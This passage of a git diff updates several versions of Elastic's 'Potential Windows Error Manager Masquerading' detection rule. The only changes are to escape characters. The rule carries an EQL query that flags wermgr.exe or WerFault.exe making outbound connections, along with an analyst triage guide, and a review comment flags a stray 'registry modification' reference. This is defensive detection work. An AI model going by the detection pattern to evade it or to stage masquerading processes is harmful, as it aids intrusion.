This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", "references": [ "https://twitter.com/SBousseaden/status/1235533224337641473", @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_103.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_103.json index c10e962938e..0e26d53102c 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_103.json 
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Windows Error Manager Masquerading", - "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", "references": [ "https://twitter.com/SBousseaden/status/1235533224337641473", @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_104.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_104.json index 18b33d974d5..f686cfef79f 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_104.json 
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Windows Error Manager Masquerading", - "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", "references": [ "https://twitter.com/SBousseaden/status/1235533224337641473", @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_105.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_105.json index d5255db7ab4..aea5349cb5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_105.json 
@@ -16,7 +16,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Windows Error Manager Masquerading",
- "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n",
 "references": [
 "https://twitter.com/SBousseaden/status/1235533224337641473",
@@ -93,7 +93,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_106.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_106.json
index 205d7465397..1def50ecd67 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_106.json
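Review bot: The new `note` string still closes its investigation steps with "searching for login events (for example, 4624) to the target host after the registry modification", but this rule fires on a `wermgr.exe`/`WerFault.exe` start with no arguments followed by an outbound connection, and no registry event is part of the logic; the wording appears to be carried over from a registry-focused guide. Suggest `...searching for login events (for example, 4624) to the target host after the suspicious process start and network connection.` so analysts pivot on the right event. The identical `note` text is also added in the _106 copy of this rule in the next file section. The closing bracket of `references` lies outside the hunk.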
@@ -16,7 +16,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Windows Error Manager Masquerading",
- "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - 